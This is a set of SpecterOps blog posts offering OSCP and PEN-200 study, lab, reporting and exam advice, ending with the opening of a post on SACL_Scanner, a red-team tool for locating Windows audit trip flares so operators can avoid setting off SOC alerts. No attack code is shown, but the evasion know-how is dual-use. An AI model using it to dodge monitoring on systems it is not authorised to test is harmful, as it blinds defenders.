If, despite following this advice, you’re still found guilty of academic misconduct, stay calm and professional. Cooperate fully with the investigation, be honest and transparent, and avoid becoming defensive—it’s important not to escalate the situation. Instead, politely request specific details regarding the accusation, seek to understand the exact concerns, and explain any misunderstood behavior or tools (e.g., a tool that was not on the shortlist of restricted software but raised concern). If you’re unsatisfied with the outcome, wait a week or two to cool off before submitting a formal appeal to challenges [at] offsec [dot] com. Maintain the same professional and respectful tone in your appeal as you did during the investigation.

On a final note, it’s important to acknowledge that OffSec exams involve a high degree of monitoring. Your screen is shared throughout the exam, you’re under near-continuous video surveillance, and you must perform a 360-degree scan of your workspace to confirm that no unauthorized devices or individuals are present. Before beginning the exam, Windows users are required to execute a proctor-provided PowerShell script that gathers system information and lists running processes—likely to flag potentially unauthorized tools. Out of an abundance of caution, it’s a good idea to clean up your local system before exam day; remove any personal files or unfamiliar tools that could trigger concern. For more details on how OffSec collects and processes personal data, refer to their Privacy Policy.

NOTE:

If you’re uncomfortable with the format or privacy implications of the OSCP exam, you might consider alternatives like the Certified Red Team Operator (CRTO) or Practical Network Penetration Tester (PNPT). These certifications cover similar material and offer more flexible testing policies.

OffSec has every right (and responsibility) to uphold the integrity of its certification, but that doesn’t make the proctoring process any less stressful for honest students. Trying to be diplomatic while raising a nuanced point, it’s fair to say that even well-intentioned candidates may find themselves under scrutiny. By taking proactive steps to minimize ambiguity in your environment and interactions with the proctors, you not only protect your OSCP investment but also reinforce the professional habits OffSec aims to instill through its arduous exam process.

Conclusion

Feel free to leave a comment with any questions, feedback, or additional advice to contribute to this discussion. In the final post of this series, I’ll cover what students should do after each OSCP exam attempt—whether they pass or not.

Getting the Most Value Out of the OSCP: The Exam was originally published in Posts By SpecterOps Team Members on Medium, where people are continuing the conversation by highlighting and responding to this story.

How to leverage the PEN-200 simulated black-box penetration testing scenarios for maximal self-improvement and career success.

DISCLAIMER:

All opinions expressed in this article are solely my own. I have reviewed the content to ensure compliance with OffSec’s copyright policies and agreements. I have not been sponsored or incentivized in any way to recommend or oppose any resources mentioned in this article.

Introduction

In the last post of this series, I explored some hidden benefits and extra steps students should take when writing notes for the PEN-200: Penetration Testing with Kali Linux course. Before attempting the Offensive Security Certified Professional (OSCP) exam, it’s highly recommended to complete the practical lab networks. But first, read this article to learn how to maximize the lab experience.

PEN-200: Penetration Testing Certification with Kali Linux | OffSec

During the Labs…

“Success is no accident. It is hard work, perseverance, learning, studying, sacrifice, and most of all, love of what you are doing.” — Pelé

The PEN-200 course includes multiple virtual lab environments, each offering an opportunity to grow as an offensive security professional. The three key takeaways from this post are:

1. Learn how to write a high-quality penetration testing report and apply those skills to each lab network
2. Use the labs as a baseline to build your own testing environment where you can refine offensive techniques, understand how misconfigurations arise, and analyze network packets associated with different attacks
3. Develop a repeatable testing methodology, apply it to the labs, and continuously refine it through an iterative process

Write Reports for Each Lab

For all the effort OSCP candidates put into identifying and exploiting technical vulnerabilities, the irony of the course is that its arguably most valuable skill is also the least offensive: report writing. In the real world, the value of an offensive security engagement doesn’t come from hacking efforts alone—it mostly comes from a legible, actionable, and informative report. Given this, it’s somewhat disappointing that the OSCP exam report—a required component of the certification process—is graded more on accuracy than quality. According to the PEN-200 Reporting Requirements, “[students] must submit an exam penetration test report clearly demonstrating how [they] successfully achieved the certification exam objectives”. This policy ensures that passing students have demonstrated the minimum technical competency of an offensive security professional, but not necessarily the writing skills needed to excel in the field. If your goal is not just to pass the exam but to be a standout candidate in future consulting roles, you should learn how to write an exemplary penetration test report and use the PEN-200 labs as practice.

Report writing is often the least enjoyable part of a penetration test, but a poorly written report can have serious consequences. The most immediate impact may be frustration from supervisors or colleagues, but the affected audience is often much larger. If your firm has a quality assurance (QA) process, multiple rounds of revision can delay the report’s delivery, damaging the company’s reputation. Worse, if significant errors slip through and the client receives a flawed report—such as one containing incorrect, incomplete, or difficult-to-read sections—the aftermath can be disastrous. Miscommunication about findings can lead to delayed security improvements, inadequate risk mitigations, and ultimately an unresolved attack surface. The client may become furious over wasted time and resources, potentially demanding revisions, reattempts, or—worst-case scenario—a partial or full refund.

Given the stakes, it’s imperative to take reporting seriously—and this is where the PEN-200 labs come in. While their official purpose is to provide students a sandbox environment for practicing their newly learned offensive techniques, they also serve as an excellent training ground for report writing. The lab structures simulate a black-box penetration test scenario, lending authenticity and relevance to aspiring offensive security professionals. Furthermore, three lab networks are specifically designed to replicate the OSCP exam conditions, allowing students to simulate the exam environment under self-imposed time constraints.

NOTE:

Consider attempting two of these lab networks within a 48-hour window (24-hours each for testing and reporting) before your first exam attempt, reserving the third for after you’ve conducted your first attempt postmortem (more on that later in the series).

Before you begin report writing, it’s essential to understand their structure. While formats vary across firms, most reports include at least an Executive Summary, Assessment Results, Attack Path Narrative, and Appendix. A full breakdown of these sections is beyond the scope of this post, but for practical guidance, Brian King’s Hack for Show, Report for Dough (Wild West Hackin’ Fest 2018) is a phenomenal resource. It also covers several report writing best and worst practices, helping students refine their skills. Students can also reference OffSec’s official OSCP exam report templates as a primary source for understanding the certification provider’s expectations.

When writing reports, I strongly advise sticking to Microsoft Word. While I personally find it somewhat infuriating and a victim of “featuritis”, it remains the dominant word processor application in the industry and offers useful features like change trackers (especially relevant for collaborative projects), cross-references, and a citation management system. For screenshots, I highly recommend Greenshot, Flameshot, Snagit, and ZoomIt from the Sysinternals suite. Including a network topology diagram in your lab reports can improve clarity—draw.io is a popular choice for this. Finally, ensure that your report writing toolset does not violate OffSec’s Academic Policy; for example, as stated in the OSCP Exam Guide, using large language models (LLMs) and artificial intelligence (AI) chatbots to generate or refine content constitutes sharing PEN-200 material with a third-party, which is a copyright violation.

Each firm has its own style guide for consultants, so it’s important to adopt a writing style that aligns with industry expectations when creating lab reports. While I couldn’t find a publicly available style guide specifically for penetration test reports, the Microsoft Writing Style Guide serves as a suitable alternative. Below are key writing principles to follow, with some modifications and additions to Microsoft’s guide:

• Use active voice over passive voice (e.g., “the student scanned the host…” vs. “the host was scanned by the student…”), unless the latter sounds objectively less “awkward”
• Maintain a consistent preterite verb tense and third-person narrative (e.g., “the student conducted a penetration test…”)
• Spell out acronyms on first use (e.g., “dynamic link library (DLL)”)
• Assign articles to acronyms based on pronunciation (e.g., “a DLL, an ISP”)
• Ensure text in screenshots is at least as large as figure subtitles or body text for readability
• Avoid opinionated language, colloquialisms, redundant phrases, and contractions to maintain a professional tone

Welcome - Microsoft Writing Style Guide

The main drawback of using the PEN-200 labs for report writing practice is that students cannot share their reports for peer-review due to copyright restrictions. According to Section 16 (IP Ownership) of OffSec Terms and Conditions, students are forbidden from sharing derivative PEN-200 content such as lab walk-throughs—which implicitly includes reports. Violating this agreement could result in punitive action from OffSec, such as having existing certifications revoked or being banned from future enrollment. To work within these constraints, students should conduct independent research on report writing and rigorously self-grade their reports while keeping them private. Those seeking peer feedback can instead write reports on alternative virtual lab environments with looser copyright restrictions, such as Hack the Box (HTB), and request evaluation from qualified career mentors.

It’s in your best interest to start developing your report writing skills early and the professionally managed PEN-200 lab networks provide an excellent environment to practice within. If you’re still struggling with report writing—or want to learn more about report review, delivery, and feedback procedures in general—consider enrolling in Luke Rogerson’s The Art of Report Writing, offered by Zero-Point Security. While I haven’t personally taken the course, it comes highly recommended by many in the consulting field and features an expansive syllabus. Investing in your report writing abilities—both during the PEN-200 labs and through external resources—will pay dividends in your future career.

Use the Labs as a Baseline for Your Personal Lab

The PEN-200 labs are excellent for simulating black-box penetration tests, but students shouldn’t rely solely on them for experimenting with offensive techniques. Your ultimate goal should be to either design a personal lab for yourself or use an existing template by the time you have completed the PEN-200 labs. If you choose to follow the former path, don’t be afraid to take inspiration from the labs when designing your own.

Developing your own cyber range offers several advantages over the PEN-200 labs. Most obviously, your lab access won’t expire when your OffSec subscription ends. Setting up a personal lab manually also deepens your understanding of how misconfigurations and vulnerable applications introduce security risks. You can also expand upon the PEN-200 syllabus by incorporating technologies not covered in the course, such as security incident and event management (SIEM) solutions, Kerberos delegation attack paths, and persistence techniques, to name a few. If you want to get even more granular, you can use a network protocol analyzer utility like Wireshark to manually inspect the network packets associated with your favorite tools or exploits. Finally, for students eager to stay current with cybersecurity trends, a personal lab provides a low-risk environment to deploy and test new exploits and tools.

Historically, deploying a personal cybersecurity lab was a costly endeavor. The resources required to simulate an entire Active Directory (AD) network required substantial investments in RAM, CPU cores, and HDD/SSD storage, often housed in bulky rack servers or large PC chassis. For those starting from scratch, costs can easily creep up to hundreds or even thousands of dollars. Luckily, mini PCs like the GMKtec NucBox offer a significantly more affordable and compact alternative to the comically large and expensive gaming rigs often associated with home labs. You can even purchase a barebones mini PC—no RAM, SSD, or OS pre-installed—and salvage memory and storage components from refurbished PCs. By integrating them into a custom-built setup and installing an open-source OS like Ubuntu, you can significantly cut costs while still aggregating the hardware required to create a fully functional lab environment.

Deploying a cybersecurity lab has traditionally been seen as a technically demanding experience due to the sheer scope of involved technologies. Most PEN-200 students may already be familiar with virtualization platforms like VMware Fusion and Workstation or Oracle VirtualBox, but not necessarily infrastructure as code (IaC) tools like Vagrant, Terraform, Ansible, and Packer. Similarly, containerization platforms such as Docker, Podman, or Kubernetes (K8s) introduce additional complexity. Once the lab is deployed, students must also administer network segmentation, domain name system (DNS) records, snapshot management, and, in the case of free licensed Windows virtual machines (VMs), manually extend the 180-day trial period by rearming the instance. Thankfully, platforms like Ludus have emerged to simplify the cybersecurity lab deployment process, consolidating many of these technologies into a single, streamlined solution.

Ludus is a cyber range orchestration platform that Erik Hunstad, the founder of Bad Sector Labs and Chief Technology Officer of Sixgen, created. The platform is built on top of the Proxmox Virtual Environment (Proxmox VE) hypervisor—a powerful open-source solution for VM and container management—enabling the virtualization of entire simulated networks. Among its many features, Ludus supports user-defined networking and firewall rules, DNS record management, snapshot functionality, and automated configuration pulls from Ansible Galaxy’s collection library. It deploys VM templates that can either be sourced from Ludus’s builtin library or customized and imported. The end-user only needs to install Ludus on a dedicated host, create an environment configuration file, deploy the range, and apply host- or domain-specific changes—which can easily be automated. Ludus is an extremely powerful and customizable tool for students who want to focus on refining their penetration testing skills rather than spending excessive time troubleshooting setup issues.

Ludus | Ludus

Designing a cyber range from scratch can be intimidating, but fortunately, multiple preconfigured penetration testing labs are available for students to deploy. One of the most popular lab templates today is Game of Active Directory (GOAD) by M4yFly, offered by Orange Cyberdefense. GOAD supports multiple attack path scenarios, many of which are covered in the PEN-200 course, making it an ideal choice for a first personal cyber range. It is also compatible with Ludus, further simplifying deployment.

Game Of Active Directory v2

Regardless of whether you use GOAD, a custom-built network, or another public lab template, consider supplementing the range with Elastic Security, an SIEM platform from the Elastic Stack (ELK). Integrating Elastic Security—or another free SIEM solution—into your lab allows students to observe how offensive techniques are detected in real time, providing valuable insights into defensive strategies. Elastic Security is also Ludus-compatible and, to demonstrate how to integrate it with a personal cyber range, I recommend this walkthrough from I.T. Security Labs that shows how to deploy GOAD with Elastic Security through Ludus.

NOTE:

Other noteworthy lab templates include BadBlood, ADCS Lab, and SCCM Lab, the last two of which are compatible with Ludus. BadBlood (by Secframe) is a PowerShell scripting suite that generates polymorphic Microsoft AD cyber ranges, ensuring distinct challenges with each invocation. The ADCS and SCCM labs focus on Active Directory Certificate Services (AD CS) and Microsoft Configuration Manager (MCM/SCCM). While not covered in the PEN-200 syllabus, recent security research has demonstrated that they both represent a significantly large attack surface, and the aforementioned labs provide an opportunity to develop skills in testing and securing both technology stacks.

In conclusion, a personal cybersecurity range inspired by the PEN-200 lab networks provides several key advantages: freedom from OffSec subscription limits, exposure to multiple relevant technologies, a sandbox for testing new techniques and tools, and the ability to integrate operational security (OPSEC) solutions. If you successfully design a custom penetration testing lab from scratch (not derivative of PEN-200 content), you can share your deployment template publicly—a valuable addition to your portfolio that can strengthen future job applications.

Develop a Testing Methodology

Once you begin the PEN-200 labs, it’s crucial to develop a repeatable and self-improving testing methodology early to avoid falling into a “spray and pray” mentality. A structured approach not only helps you uncover hidden vulnerabilities more efficiently, but also minimizes the risk of needing lab extensions or incurring multiple exam retake fees—maximizing the value of your PEN-200 experience.

In the context of PEN-200 and offensive security, a testing methodology is a systematic process encompassing enumeration, documentation, tool selection, exploit testing, privilege escalation, and post-exploitation routines. Ideally, your methodology should evolve as you progress through the labs—allowing you to address knowledge gaps, adopt time-saving techniques, and incorporate novel attack strategies. Students who follow a codified and mature testing methodology are less likely to waste time redoing scans, chase dead ends, overlook low-hanging fruit, become prone to burnout and frustration, or rely on luck or accidental success to achieve the testing objective.

In the first post of this series, I introduced the concept of command reference guides (AKA “cheat sheets”), which serve as a repository for your preferred offensive tooling usage. Beyond providing easy copy-and-paste shortcuts for commands, your reference guide can be structured to align with your testing methodology. In our previous example, I demonstrated how you could leverage Obsidian to document the usage of impacket-GetUserSPNs for conducting a Kerberoasting attack. Let’s expand on this example by organizing the navigation pane of the guide into distinct phases of a simple penetration testing methodology.

Our reference guide now consists of seven root directories, each representing a major phase of a typical penetration test (e.g., Reconnaissance, Initial Access, Privilege Escalation, etc.). Notice how each of the three tools we’ve added so far (i.e., impacket-GetUserSPNs, BloodHound, and Hashcat) is intuitively placed within the appropriate parent directory, and further compartmentalized into subdirectories based on the specific technique utilized during that phase (e.g., Identifying Kerberoastable Accounts, Kerberoasting, Hash Cracking, etc.). In the Internal Enumeration and Privilege Escalation phases, we’ve gone a step further by dividing techniques by the environment we’re working in—in this case, Active Directory, Linux, and Windows. Since Kerberoasting is specific to AD environments, we placed our entry for BloodHound and impacket-GetUserSPNs in the Active Directory subdirectory of Internal Enumeration and Privilege Escalation, respectively.

I want to emphasize the importance of iterative learning when developing your testing methodology. It’s unrealistic to expect that your initial attempt at following a testing methodology will be optimal, so it’s critical to refine your process after each lab or exercise—especially during the early, high-growth stage of your OSCP journey. Consider keeping a brief log for each machine or network within your reference guide, summarizing the attack path, the tools and techniques you utilized, and the areas where you struggled most. Use the last section in particular to feed both successes and setbacks into your methodology refinement. This continuous improvement process will steadily strengthen your assessment methodology, significantly boosting your confidence and skills ahead of the OSCP exam.

In conclusion, I strongly encourage students to treat the labs not just as an opportunity to improve their ability to identify and exploit vulnerabilities, but also as a chance to build an iterative, professional methodology for offensive security engagements—and to commit to regularly polishing it as they progress. Doing so will not only prepare you for the OSCP exam, but will also translate directly to future responsibilities in a consulting role, strengthen your technical interview performance, and ultimately support your growth as a security professional.

Conclusion

If you have questions, feedback, or suggestions you feel should have been included in this post, please feel free to leave a comment. In the next installment of this series, I’ll dive into the OSCP exam itself.

Getting the Most Value Out of the OSCP: The PEN-200 Labs was originally published in Posts By SpecterOps Team Members on Medium, where people are continuing the conversation by highlighting and responding to this story.

In this second post of a five-part series, I provide advice on how to best utilize the PEN-200 course material for a successful career in ethical hacking.

Disclaimer:

All opinions expressed in this article are solely my own. I have reviewed the content to ensure compliance with OffSec’s copyright policies and agreements. I have not been sponsored or incentivized in any way to recommend or oppose any resources mentioned in this article.

Introduction

In my previous post in this series, I discussed practical steps students could take before enrolling in the PEN-200 to get the most value out of the pursuit for the Offensive Security Certified Professional (OSCP) certification. The next step is to discuss what to do while reading the official course material.

PEN-200: Penetration Testing Certification with Kali Linux | OffSec

During the Course

“One hour per day of study in your chosen field is all it takes. One hour per day of study will put you at the top of your field within three years. Within five years, you’ll be a national authority. In seven years, you can be one of the best people in the world at what you do.” — Earl Nightingale

The PEN-200 course is composed of 28 distinct modules covering fundamental penetration testing concepts. In this post, I discuss my advice for students starting the course. My three main arguments are:

1. Use the note-taking process and exercises in PEN-200 as a chance to build confidence with tools and platforms relevant to offensive security roles
2. Not all PEN-200 techniques are practical for real-world assessments — some require adaptation to evade defenses while others risk service disruption, credential exposure, and more; understanding these nuances will make you a more effective and responsible professional
3. PEN-200’s curated references to blogs, proof of concepts (PoCs), and whitepapers provide not only valuable learning but also insight into key industry contributors, which can give you an edge in job hunting and networking

Use Job-Relevant Tools and Platforms to Write Your Notes

The OSCP certification is primarily geared towards beginner-level security professionals, so it’s fair to assume that most students have limited experience with the tools that offensive security consultants commonly use. The PEN-200 course provides a valuable opportunity for OSCP candidates to gain exposure to these tools and build their proficiency before entering the field.

To clarify, this section is not about the “hacking tools” you will inevitably use to identify and exploit vulnerabilities — PEN-200 provides ample guidance on those. My advice focuses on tools that are tangential to offensive tasks but still widely used in cybersecurity roles.

The PEN-200 course is designed to be completed using Kali Linux, a Debian-based distribution pre-installed with many of the most popular tools for offensive security testing. While Kali is convenient for quickly deploying a Linux virtual machine (VM) with a broad toolkit, you shouldn’t feel restricted to using it for professional development. Experiment with other Linux distributions (e.g., Parrot OS, BackBox Linux, BlackArch) and even Windows-based distributions (e.g., CommandoVM, FLARE-VM) while improving your proficiency with virtualization software like VMWare or VirtualBox.

Kali Linux | Penetration Testing and Ethical Hacking Linux Distribution

Although it is more commonly associated with software development, git — the popular version control system — is a valuable asset to offensive security consultants. Deploying your PEN-200 notes to a git repository offers a great opportunity to improve your fluency with fundamental operations like commit, pull, push, merge, and more. The biggest hurdle to mastering git is often the concept of “branching”: the process of diverging from the master branch (often called master or main , depending on your platform), making independent changes, then later merging those changes back into the main branch. Fortunately, there are many excellent online tutorials to help with this.

Learn Git Branching

If you choose to use git for your notes, consider hosting them in a private repository on GitHub or GitLab. Both platforms are based on git but offer additional features such as access control, repository templates, Markdown support, and more. Personally, I prefer GitLab for storing my notes due to its granular visibility controls, but GitHub is undeniably the most popular option and the one you’re most likely to encounter in a cybersecurity role. Whichever platform you choose, make absolutely sure it’s locked down and only you can access it. Copyright infringements of OffSec’s proprietary course materials — even accidental ones — can result in punitive responses from OffSec.

Now that you’ve chosen where to host your notes, it’s time to start writing them! The three most popular command-line text editors are Vim, Emacs, and nano. Of these, nano is the most beginner-friendly and an excellent starting point. Both Vim and Emacs are feature-rich and highly customizable, but have a high learning curve. If productivity and modularity are values you prioritize, it pays to start learning one (or both) early. The debate over which is superior is so enduring that it even has its own Wikipedia article.

Of the two, I only have experience with Vim, so it’s the only one I can recommend. Its commands can be confusing at times, but it’s a huge productivity booster in the long-run. If you decide to go down the Vim rabbit hole, I recommend starting with Vi, Vim’s precursor. Vi supports fewer commands, but is more likely to be encountered on older Linux distributions, so you won’t be caught off guard when your favorite Vim commands aren’t working. Once you’ve got the hang of Vi and are ready to graduate to Vim mastery, consider using the online tutorial/game VIM Adventures to hone your skills.

Learn VIM while playing a game - VIM Adventures

Command-line text editors can be fun, but they’re not for everyone. If that’s you, I highly recommend Obsidian as your note-taking application. As I discussed in my last blog post, Obsidian is an extremely popular graphical text editor packed with useful features. In 2021, an employee of the cybersecurity consulting firm TrustedSec published a blog post detailing how they incorporated Obsidian into their internal tradecraft documentation. While this setup isn’t a one-to-one equivalent of an online course, the features showcased in the article — especially the usage of the Obsidian-Git community plugin — are particularly relevant for PEN-200 students.

Obsidian, Taming a Collective Consciousness

tmux is an open-source terminal multiplexer which allows users to manage multiple terminal instances from a single screen. This might not seem groundbreaking if you work from a multi-monitor desktop; however, tmux is a game-changer when you’re managing multiple jobs on a remote Linux system with only shell access. You can split your terminal into multiple panes, reattach to sessions in case a connection drops, or run concurrent background jobs and reconnect to them as needed. Needless to say, it’s an incredibly powerful utility that’s often overlooked. Most PEN-200 students know IppSec from his Hack the Box (HTB) walkthroughs, but his tmux tutorial is just as valuable to OSCP-hopefuls.

Lastly, take advantage of every opportunity to sharpen your scripting skills in languages like Python, Bash, PowerShell, and more. Some great use cases would be scheduling tasks on Kali via cron jobs, or automating the process of reconnaissance, post-exploitation enumeration, and credential extraction. As you study, you’ll come across many PoC exploits — some written in languages you don’t know, others that could be improved upon. Instead of settling, why not rewrite the PoC yourself in your preferred language? Not only does this give you a working exploit, but it also becomes a strong addition to your job application portfolio. For inspiration, check out this blog post by a colleague of mine, who developed a working exploit for CVE-2022–35914 after finding the official solution for an OffSec Proving Grounds machine unsatisfactory. When developing scripts or PoCs, consider using a code editor like Visual Studio Code, a popular Microsoft option packed with features and supported languages.

Charting a path to RCE thru PHP callbacks

In short, be proactive when writing your notes. While you may never need to learn an entirely new scripting language, coding platform, or operating system on the fly during a billable engagement, it helps to have a solid grasp of the most useful technologies before landing your first consulting job.

Understand the Real-World Impact of Each Technique

The PEN-200 course provides a thorough and comprehensive foundation in penetration testing. However, applying its techniques in real-world engagements exactly as taught — without considering their potential impact — can lead to unintended consequences. Understanding not just how a technique works but also when, where, and whether to use it, distinguishes a skilled penetration tester from “script kiddies”. This section explores the risks of blindly following course material and how students can develop the judgment necessary to apply techniques responsibly in real-world engagements.

NOTE:

Developing a mature understanding of our tradecraft also helps mitigate the risk of introducing a backdoor through our toolkit. This is demonstrated in a recent CloudSEK report, which revealed that a trojanized version of a remote access Trojan (RAT) malware builder infected 18,459 devices, mostly belonging to cybersecurity students and hobbyists.

OSCP-certified professionals generally agree that PEN-200 does not emphasize stealth. While the syllabus includes an antivirus (AV) evasion module, the course primarily teaches identifying and exploiting vulnerabilities rather than evading detection — likely to prevent overwhelming new students. However, many of these techniques would immediately trigger alerts in security-mature environments. For example, Mimikatz, a popular tool for extracting plaintext credentials and password hashes from Windows Local Security Authority Subsystem Service (LSASS) memory, would almost certainly trigger endpoint detection and response (EDR) alerts if triggered in its original binary form. Many penetration testing techniques face similar scrutiny, and students should understand their OPSEC implications before applying them in real-world assessments.

When people think of service disruption in cybersecurity, their minds often jump to denial of service (DoS) attacks. However, even legitimate penetration testing techniques , if used carelessly, can cause outages and service unavailability. This risk is a major deterrent for businesses considering cybersecurity consulting services, as potential disruptions — such as bandwidth spikes, application latency, or unscheduled downtime — can lead to performance degradation and reputational damage. Common offenders include port scanners like Nmap, vulnerability scanners like Nessus, and brute-force password tools like Kerbrute, which can trigger account lockouts due to repeated failed login attempts. In real-world scenarios, penetration testers must pace network scans carefully, communicate clearly with the client about targeted systems and services, and adhere to account lockout policies to minimize disruptions.

Some tools and techniques can inadvertently expose plaintext credentials or hashed passwords, introducing serious security risks. In a simulated exercise, for example, we might use Mimikatz to dump NT LAN Manager (NTLM) hashes from memory or input a username and password into the Get-Credential PowerShell cmdlet before passing them to a PowerView function. While this may seem harmless in a controlled lab environment, the real-world consequences are far graver. If a Windows host logs command line output or an EDR solution records process activity, these credentials could be stored in logs accessible to administrators, regular users, or even threat actors — potentially leading to credential theft and further malicious actions long after the engagement is complete. Using third-party cloud-hosted tools to process artifacts containing client secrets — such as CrackStation for password hashes or DynamiteLab for packet captures — could also result in credential exposure, as neither the consultants nor the client have control over where that sensitive data is stored.

Lastly, we must consider whether a method could violate personal ethical boundaries or contractual obligations. Cybersecurity consulting firms often establish internal guidelines prohibiting high-risk activities that could cause irreversible damage with little value in a report, such as intentional DoS attacks, disabling security services, unauthorized password changes, or exfiltrating sensitive data like the ntds.dit database or structures containing personally identifiable information (PII). Consultants are also contractually bound by the client-imposed rules of engagement (ROE), which may restrict certain tactics or system/user targets, requiring testers to adjust their tradecraft. For example, Responder, a tool used for capturing NTLM v2 hashes, could unintentionally collect credentials from out-of-scope users or systems, constituting an indirect ROE violation. Ultimately, both personal ethics and professional constraints can significantly impact how penetration testers apply offensive techniques in real-world engagements.

In this section, I’ve explored four critical questions students should ask themselves after becoming proficient with a new security tool or technique:

1. Does this tool/technique carry a high risk of triggering OPSEC solutions?
2. Could this tool/technique result in service disruptions?
3. Could this tool/technique expose plaintext credentials or weak password hashes?
4. How could this tool/technique violate ethical or contractual boundaries?

NOTE:

Other important questions to consider — but omitted for brevity — include: “Would bypassing a common OPSEC solution for this tool/technique require disabling security services?”, “Does this tool/technique leave behind system artifacts that require cleanup to maintain stealth or as part of post-engagement procedures?”, and “Which threat actors have used this tool/technique before?”.

While these questions are important, they should not interfere with your learning process while navigating the course for the first time. Instead, keep them in the back of your mind and revisit them once you have the confidence and time to explore them fully. Developing this awareness early will help ensure you approach offensive security with the professionalism and responsibility expected in real-world engagements.

Read the Footnotes and Follow the Authors

Earlier this year, while preparing for the Offensive Security Experienced Penetration Tester (OSEP) certification, I was working through the PEN-300 course material, a direct continuation of the techniques taught in PEN-200. As I reviewed the footnotes in one of the modules, a particular blog post caught my attention. The topic was interesting, but what really stood out was the author’s handle — it looked vaguely familiar. Curious, I clicked on their profile to dig deeper.

A few seconds later, it hit me. I had accidentally stumbled on my boss’s old blog channel!

This story underscores an important lesson: the footnotes in PEN-200 (and other OffSec courses) aren’t just extra reading material — they’re a window into the offensive security industry. The white papers, PoCs, and blog posts referenced in these courses were written by researchers and hackers who have shaped modern penetration testing techniques and, in some cases, you may even cross paths with them later in your career. Taking the time to explore these citations offers more than just educational enrichment. It provides insight into “who’s who” in the industry, giving you an edge when networking or job hunting. While the extra reading may seem tedious, its benefits are an underappreciated strength of the course.

Understanding who the key players are in offensive security isn’t just an academic exercise; it’s a form of situational awareness that can benefit your career. The individuals whose blog posts and exploit code appear throughout the PEN-200 course are often the same ones presenting at security conferences, contributing to your favorite security tools, or even leading your next interview. The offensive security industry is surprisingly small, so by familiarizing yourself with just a handful of regular contributors, you gain a solid understanding of current industry trends, the companies driving innovation in different areas of cybersecurity, and even what technical skills hiring managers are prioritizing. This awareness can help you make more informed decisions, from identifying career mentors to choosing which companies to apply to.

Once you’ve read the footnote and understood its material, make an effort to follow the author on any platform where they have a public profile. Many security researchers publish their articles on Medium, but it’s also common to find their work cross-posted on personal websites. If the author works at a cybersecurity consulting firm, check their company’s blog — firms like TrustedSec, Mandiant, PortSwigger, and SpecterOps regularly publish security research. If the footnote references a coding project, explore the author’s GitHub profile to see their other work or contributions to open-source projects. Following them on X (formerly Twitter), BlueSky, or LinkedIn ensures you’ll receive timely updates on future publications. Lastly, try searching for the author on YouTube by their full name or handle, as they may have presented at major cybersecurity conferences like DEF CON, Black Hat, or RSA Conference.

Taking the time to read the footnotes and dive into the work of influential security researchers not only enhances the educational value you gain from the PEN-200 course, but also sharpens your situational awareness of the offensive security industry. This knowledge can serve as a powerful networking tool, help you discover new areas of professional interest, and guide your career path. So, next time you come across a footnote, don’t just skim it — take the extra step and use it as a launchpad for further exploration. You might just end up connecting with your next manager…

Conclusion

As always, feel free to comment if you enjoyed the article, have questions/criticisms, or would have liked to see other arguments included. In the next post, I will discuss my advice for the PEN-200 labs.

Getting the Most Value Out of the OSCP: The PEN-200 Course was originally published in Posts By SpecterOps Team Members on Medium, where people are continuing the conversation by highlighting and responding to this story.

During red team operations, stealth is a critical component. We spend a great deal of time ensuring our payloads will evade any endpoint detection and response (EDR) solution, our traffic is obfuscated and hard to trace, and our commands will interact with a system in a way that limits the number of possible detection opportunities based on our actions that could thwart our operation; however, even when tiptoeing around a client environment, we have likely all experienced a scenario where we happen to list the wrong directory, read the wrong file, or access the wrong registry key and set off an alert to the Security Operations Center (SOC) to get an investigation rolling. I am, of course, talking about that pesky system access control list (SACL) that made a simple Windows event to let the SOC know someone tried to access something they should not.

DACL vs. SACL

If you have spent some time in the field, you are likely familiar with DACLs and SACLs, but I will do a quick recap to refresh some minds and educate the rest. We will start with the securable object. From Microsoft’s documentation: “A securable object is an object that can have a security descriptor. All named Windows objects are securable. Some unnamed objects, such as process and thread objects, can have security descriptors too.” So, any securable object can have a security descriptor applied to it that can contain access control lists (ACLs). We are talking about files, registry keys, processes, pipes, services, etc. The ACLs within the security descriptor come in two flavors: discretionary access control lists (DACLs) and SACLs.

Most people are more familiar with the DACL, which determines whether a security principal attempting to access a securable object in question is allowed to do so based on allow or deny entries. This is done based on several factors in the access token, but in short, we can equate it to the doorman at a bar. A user attempts to access the bar and presents their ID to the doorman, then the doorman checks their ID and allows or denies them entry based on the information provided. SACLs, on the other hand, are more like a logbook. They are not determining access; they only log whether the security principal succeeded or failed to access the securable object. We can think of this as a scribe standing next to the doorman at the bar, writing down the names of every person who attempts to access the bar and whether the doorman allows or denies them.

We have seen the use of these technological trip flares increasing lately. While the increase in SACL usage is not bad, it does mean that we need to be even more careful about what we access in an environment. Honeypot accounts in Active Directory (AD) can catch the use of tools like BloodHound when it tries to read an AD object that no one was intended to read, the registry could be watched to see if an attacker tries to access local security authority (LSA) registry keys, or it could be as simple as a “password” file on a share set to let defenders know if someone tries to access some suspiciously sweet administrator credentials. As organizations and defenses mature, it is becoming more crucial for red teamers to know what we should not risk touching.

Enter SACL Scanner

To help with this, and learn C along the way, I created a simple C program called SACL_Scanner to aid fellow red teamers in identifying the configured trip flares so we can avoid them. Currently, it will scan for SACLs on three local Windows securable objects and AD: registry keys, services, files/directories, and AD objects. It is also compiled to run with execute_pe in most C2 frameworks since it is much more likely that a red teamer will be in that scenario rather than directly on a host running programs.

Before we get into the demos, we need to talk about the obvious barrier to what we are trying to achieve: privileges. We will need the SE_SECURITY_NAME privilege corresponding to the objects we are trying to read. This means that we must be at least an administrator or have the SE_SECURITY_NAME privilege assigned to our access token. It is likely that when you are really worried about SACLs on other users’ files, registry keys for the security account manager (SAM), or mucking with services on the local host, you are already an administrator; ergo, it should not be too much of an issue there. However, when trying to read the SACLs on AD objects, we run into a bit of a catch-22 in that we might want to know what objects we should not touch so we can execute an attack path in AD to elevate our access therein, but we need elevated permissions to read the SACLs on AD objects to know which objects we should not touch. Sadly, I do not have a solution for that as that is AD working correctly. Nevertheless, we can still obtain additional information once we have elevated our access, tread lightly, and limit our indicators of compromise (IOCs).

Additionally, something the tool is not going to do is let you know the status of whether auditing itself is enabled. SACLs are two parts that combine to make event logs for detection: the SACL itself on the securable object and the computer audit policy settings determine whether the logs themselves are generated. Both of these must be enabled for a SACL to provide any value. If the SACL is set on an object but auditing is not enabled, the SACL does not really matter. Conversely, if auditing is enabled but nothing has a SACL set, then auditing is not generating anything. One could argue this is only partially true as there are objects such as LSASS that have SACLs set by default, but we will not get into that list here as Microsoft does not make it readily available. In our case, to reiterate, we are only checking for SACLs themselves on securable objects here; not whether auditing is enabled.

